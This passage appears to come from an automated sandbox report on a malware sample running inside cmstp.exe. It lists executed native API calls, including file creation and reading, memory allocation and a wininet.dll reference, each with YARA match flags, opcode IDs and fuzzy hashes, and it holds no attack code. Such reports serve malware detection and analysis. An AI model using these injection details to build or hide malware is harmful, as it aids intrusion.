35040->35042 35044 644e50 LdrLoadDll 35040->35044 35041->35040 35043 645fe3 35042->35043 35045 644e50 LdrLoadDll 35042->35045 35043->34828 35044->35042 35045->35043 35047 6460c9 35046->35047 35048 646013 35046->35048 35047->34830 35048->35047 35049 64bfa0 2 API calls 35048->35049 35050 64603a 35049->35050 35050->35047 35051 64607c 35050->35051 35054 646092 35050->35054 35052 64bdd0 2 API calls 35051->35052 35053 646086 35052->35053 35053->34830 35055 64bdd0 2 API calls 35054->35055 35056 6460bd 35055->35056 35056->34830

                        Executed Functions

                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00644BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00644BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0064A3BD
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`
                        • API String ID: 823142352-1441809116
                        • Opcode ID: ba8f457fc1c587a04803f1fff820bc7ae5a6a46241081901ec85605f5cdd6379
                        • Instruction ID: ca23fe27175fcf7f6fcdb82dee6b9a86d6a28cbf6f8b80ac59ef04940f1935bb
                        • Opcode Fuzzy Hash: ba8f457fc1c587a04803f1fff820bc7ae5a6a46241081901ec85605f5cdd6379
                        • Instruction Fuzzy Hash: A401ABB6210208ABCB48DF88DC95EEB37A9AF8C754F158248FA0D97241D630E811CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00644BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00644BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0064A3BD
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`
                        • API String ID: 823142352-1441809116
                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction ID: 77f47a06503d6b30b24a973a6bed2555bb9aa463c1645cacff87c10519b4ddea
                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction Fuzzy Hash: 0DF0BDB2200208ABCB48DF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1Jd,FFFFFFFF,?,rMd,?,00000000), ref: 0064A465
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: 1Jd
                        • API String ID: 2738559852-2594264187
                        • Opcode ID: fbc3a771d0564879691bc76b435da8cba29ad5ed35d80f7c62a20454a2c8b322
                        • Instruction ID: ea10c3a5d1385715784105b270ec9d402f08e7e35322246caa275741223c229e
                        • Opcode Fuzzy Hash: fbc3a771d0564879691bc76b435da8cba29ad5ed35d80f7c62a20454a2c8b322
                        • Instruction Fuzzy Hash: 0BF0F9B2200108ABDB14DF89DC81EEB77A9AF8C754F158248BE1DA7251C630EC11CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1Jd,FFFFFFFF,?,rMd,?,00000000), ref: 0064A465
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: 1Jd
                        • API String ID: 2738559852-2594264187
                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction ID: 8d546f49bc4993c29880a3f1d87763284b9cb42b9d7322cf3cff7c2be77b8b61
                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction Fuzzy Hash: ECF0A4B6200208ABDB14DF89DC81EEB77ADAF8C754F158248BE1D97251D630E8118BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtClose.NTDLL(PMd,?,?,00644D50,00000000,FFFFFFFF), ref: 0064A4C5
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID: PMd
                        • API String ID: 3535843008-2633327531
                        • Opcode ID: 7f6c727b373d88ea61b2ad4147df0fd39eb9834ab534ddd4784be3dbc8f7a4ce
                        • Instruction ID: 12a8adfe9364c25414d01b61199bf8e15abd7aeac7214a9ff334089c73a85014
                        • Opcode Fuzzy Hash: 7f6c727b373d88ea61b2ad4147df0fd39eb9834ab534ddd4784be3dbc8f7a4ce
                        • Instruction Fuzzy Hash: A7E0C2A944A2846BEB52FBF0A8C40C7BF91EF416183194A8EE8A847507C26492099792
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtClose.NTDLL(PMd,?,?,00644D50,00000000,FFFFFFFF), ref: 0064A4C5
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID: PMd
                        • API String ID: 3535843008-2633327531
                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction ID: 9e2eb5f62d2db26a8b2188e60aa50874ebfcfdd6d1dd607b9c70a6b939dcdb04
                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction Fuzzy Hash: 09D01776240214BBE710EBD8CC85EA77BADEF48760F154499BA189B242C530FA0086E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00632D11,00002000,00003000,00000004), ref: 0064A589
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: 5f0cbc9f8c2dea21fdd80b2da96e16c22a7d55a45e7f1ee3d898d94fc073e72b
                        • Instruction ID: edec5b1c36a0cc3363bebf6df633366533cf44a9335615b49de4c197fd178c16
                        • Opcode Fuzzy Hash: 5f0cbc9f8c2dea21fdd80b2da96e16c22a7d55a45e7f1ee3d898d94fc073e72b
                        • Instruction Fuzzy Hash: 3DF015B6214209AFDB14DF89CC81EEB77ADAF8C354F158159FE5897351C630E811CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00632D11,00002000,00003000,00000004), ref: 0064A589
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                        • Instruction ID: 6146f6cfd6650cc4bd653fb7a26074e807df55331d30546b831eb52291f8aff8
                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                        • Instruction Fuzzy Hash: D0F015B6200208ABDB14DF89CC81EAB77ADAF88754F118148BE0897241C630F810CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1b1b7268c5e3e27f670278e5a7583dc764abe2835f2850c3eb685b93b76c0e96
                        • Instruction ID: a29e2196719eb33bd3db768f1cd9747971a87079e5211812ebb39e448a1f08b5
                        • Opcode Fuzzy Hash: 1b1b7268c5e3e27f670278e5a7583dc764abe2835f2850c3eb685b93b76c0e96
                        • Instruction Fuzzy Hash: 769002A120201003610571594514616444A97E0255BA1C521E60096A0DC565D8D57165
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 0f1eec790b18c4fd3b1486500841f8df4103d0cfb2a7ae50ac23760528819c41
                        • Instruction ID: 4e1b60a2c1dad3b8e73c51067813af64e24f19c04c43b844eb89f55063e88234
                        • Opcode Fuzzy Hash: 0f1eec790b18c4fd3b1486500841f8df4103d0cfb2a7ae50ac23760528819c41
                        • Instruction Fuzzy Hash: E9900265211010032105A5590704507048697D53A53A1C521F600A660CD661D8A56161
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 05199c18dddd907d99b4cb208deb830fd38aee52845bd2dc724ac5ec4f07a9b2
                        • Instruction ID: 9d93a97fb729b26d5784446a3801746cb4848300feef6bb81018c89f3587893c
                        • Opcode Fuzzy Hash: 05199c18dddd907d99b4cb208deb830fd38aee52845bd2dc724ac5ec4f07a9b2
                        • Instruction Fuzzy Hash: 05900265221010022145A559070450B0885A7D63A53E1C515F640B6A0CC661D8A96361
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 3bfd5a877cc7729ad5b348e06a1fa5b3ee21b4cdc9d642b67825700635e77fd7
                        • Instruction ID: 16d66b66a9484bdedd1cc84b7572999de48fb47e3459b90b61d519f85d6592ff
                        • Opcode Fuzzy Hash: 3bfd5a877cc7729ad5b348e06a1fa5b3ee21b4cdc9d642b67825700635e77fd7
                        • Instruction Fuzzy Hash: 0690027120101842F10061594504B46044597E0355FA1C516A5119764D8655D8957561
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 921be2ff102d1fa58dcad72256339cd7826e624510ab75856d1d3e971ecef2b2
                        • Instruction ID: d1f50eb3be6df1b97d14649941eb263de2584539cb8861207323f787d86cfb7a
                        • Opcode Fuzzy Hash: 921be2ff102d1fa58dcad72256339cd7826e624510ab75856d1d3e971ecef2b2
                        • Instruction Fuzzy Hash: 4E90027120109802F1106159850474A044597D0355FA5C911A9419768D86D5D8D57161
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c9c0d1f4946af550c139945647d0d831a3702347282d9ba40e9d64a4f24c0afa
                        • Instruction ID: ba86b4534b68440371ff334558916fa752ccc8cc4b673c1125624da61f1b1fc7
                        • Opcode Fuzzy Hash: c9c0d1f4946af550c139945647d0d831a3702347282d9ba40e9d64a4f24c0afa
                        • Instruction Fuzzy Hash: 0490027160501802F15071594514746044597D0355FA1C511A5019764D8795DA9976E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c98602790b3133c91203a1b9a74dcac1d06e957b8b4b8c81b83dcd4920588d2f
                        • Instruction ID: 2be44b35b1df27372c6e7d1de79dca4735d298ef5bce925eeb474b3ee7e16d46
                        • Opcode Fuzzy Hash: c98602790b3133c91203a1b9a74dcac1d06e957b8b4b8c81b83dcd4920588d2f
                        • Instruction Fuzzy Hash: 8890027120505842F14071594504A46045597D0359FA1C511A50597A4D9665DD99B6A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a27c762286cef368891c33d632d0a520b2d704ef1c7953c4701c82da7661dc63
                        • Instruction ID: 59c4ef3ecdd3fefd5c13a2b3b759699b515095dc8d6fd0c9329b9d6e4db3548d
                        • Opcode Fuzzy Hash: a27c762286cef368891c33d632d0a520b2d704ef1c7953c4701c82da7661dc63
                        • Instruction Fuzzy Hash: 5590027120101802F1807159450464A044597D1355FE1C515A501A764DCA55DA9D77E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e4aac227b9a5c617037c7c46fe753245e01e1fe3aad0435acc2d85558e141b9a
                        • Instruction ID: b51027e5e6b81f7a06662e3f8372de7de371a30b6080f3ced9121b834a333592
                        • Opcode Fuzzy Hash: e4aac227b9a5c617037c7c46fe753245e01e1fe3aad0435acc2d85558e141b9a
                        • Instruction Fuzzy Hash: CC90026921301002F1807159550860A044597D1256FE1D915A500A668CC955D8AD6361
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c204b91b851a173a8e66447c020f99331c45e8d063585dc8dcf3cea6c0683d9e
                        • Instruction ID: 0f25a1f1dd404b78007337b053179e6a1c8071631c5540160c4a4f5863401b5d
                        • Opcode Fuzzy Hash: c204b91b851a173a8e66447c020f99331c45e8d063585dc8dcf3cea6c0683d9e
                        • Instruction Fuzzy Hash: E490027131115402F11061598504706044597D1255FA1C911A5819668D86D5D8D57162
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 27d56ba680642ab174b4fd1ccd531f0233c54e6bac89c11a580a61f773f9ba26
                        • Instruction ID: 5c4e79f5649f14ada9ba8f30e3e0e2583ddd892aee00d4c01090353bb65a802b
                        • Opcode Fuzzy Hash: 27d56ba680642ab174b4fd1ccd531f0233c54e6bac89c11a580a61f773f9ba26
                        • Instruction Fuzzy Hash: BF90027120101402F10065995508646044597E0355FA1D511AA019665EC6A5D8D57171
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: decfad8769292527caa24f9c841d633495bc1284f73a5199b728bdcf0012db8a
                        • Instruction ID: 78efba6f2e34c15a7d32d9c1bae7c4da17d762a4ebe12884525dc80d456d60a9
                        • Opcode Fuzzy Hash: decfad8769292527caa24f9c841d633495bc1284f73a5199b728bdcf0012db8a
                        • Instruction Fuzzy Hash: B590026120505442F10065595508A06044597D0259FA1D511A60596A5DC675D895B171
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 0dac0c8b877e916affee5f4715fdcd016fc38b1cb5f2a099e733d1be50db54e5
                        • Instruction ID: e542be1b67597c83085e37f0b28c7ba4049bbf5e8b60fc7a9667be33234479a2
                        • Opcode Fuzzy Hash: 0dac0c8b877e916affee5f4715fdcd016fc38b1cb5f2a099e733d1be50db54e5
                        • Instruction Fuzzy Hash: 03900261242051527545B15945045074446A7E02957E1C512A6409A60C8566E89AE661
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 62c9b7317e1217bf9dfa6bf68e22abad5670f1b1d8d28667b01aa3cf25a18eeb
                        • Instruction ID: 9f3c592be1e7eb164b578ad31fb0c06d382d6eb2141fc11740b4249875900e56
                        • Opcode Fuzzy Hash: 62c9b7317e1217bf9dfa6bf68e22abad5670f1b1d8d28667b01aa3cf25a18eeb
                        • Instruction Fuzzy Hash: C290027120101413F11161594604707044997D0295FE1C912A5419668D9696D996B161
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c085167e933ca86e12b812cff255eddd2d623e57a7f070d5b14b85365a57864e
                        • Instruction ID: 94f8b7d4bb199b03ec19136eb3b5f8243726390970115104549fd6630bf6d93d
                        • Opcode Fuzzy Hash: c085167e933ca86e12b812cff255eddd2d623e57a7f070d5b14b85365a57864e
                        • Instruction Fuzzy Hash: AF9002A134101442F10061594514B060445D7E1355FA1C515E6059664D8659DC967166
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a7820f5650e896fb389ec1b8fea5d0acfe9f2c083cfde43f5b14e30b8dfd71ec
                        • Instruction ID: f7d279f56c5a63fc65732ab2e63f921764696d1cc1ccc0faf045e97779535bc0
                        • Opcode Fuzzy Hash: a7820f5650e896fb389ec1b8fea5d0acfe9f2c083cfde43f5b14e30b8dfd71ec
                        • Instruction Fuzzy Hash: 829002B120101402F14071594504746044597D0355FA1C511AA059664E8699DDD976A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 906129c82c5066c9fe2c4ede9f2db3c514189b2057dc3718b0a7d8f8de8c0c27
                        • Instruction ID: 7bec9b49c6d6b04cbbbd900776accfa9e9e1efd1d2317cf7f32a258c895c1a1e
                        • Opcode Fuzzy Hash: 906129c82c5066c9fe2c4ede9f2db3c514189b2057dc3718b0a7d8f8de8c0c27
                        • Instruction Fuzzy Hash: 1A90026121181042F20065694D14B07044597D0357FA1C615A5149664CC955D8A56561
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6d17ac88a19775fc2292ff1c737fac359c907793721953d8ee8c2cc5af28aca7
                        • Instruction ID: 15bbc269aeeafe97d80e2642a5353cf68e774c8157a97fc43f0f5c15c0cd215a
                        • Opcode Fuzzy Hash: 6d17ac88a19775fc2292ff1c737fac359c907793721953d8ee8c2cc5af28aca7
                        • Instruction Fuzzy Hash: D190026124101802F140715985147070446D7D0655FA1C511A5019664D8656D9A976F1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • Sleep.KERNELBASE(000007D0), ref: 00649138
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: net.dll$wininet.dll
                        • API String ID: 3472027048-1269752229
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00633AF8), ref: 0064A6AD
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: .z`
                        • API String ID: 3298025750-1441809116
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RtlAllocateHeap.NTDLL(6Ed,?,00644CAF,00644CAF,?,00644536,?,?,?,?,?,00000000,00000000,?), ref: 0064A66D
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: 6Ed
                        • API String ID: 1279760036-410410545
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CoInitialize.OLE32(00000000,00000000,00633A1A,00000000), ref: 00642777
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: Initialize
                        • String ID: @J7<
                        • API String ID: 2538663250-2016760708
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0063836A
                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0063838B
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
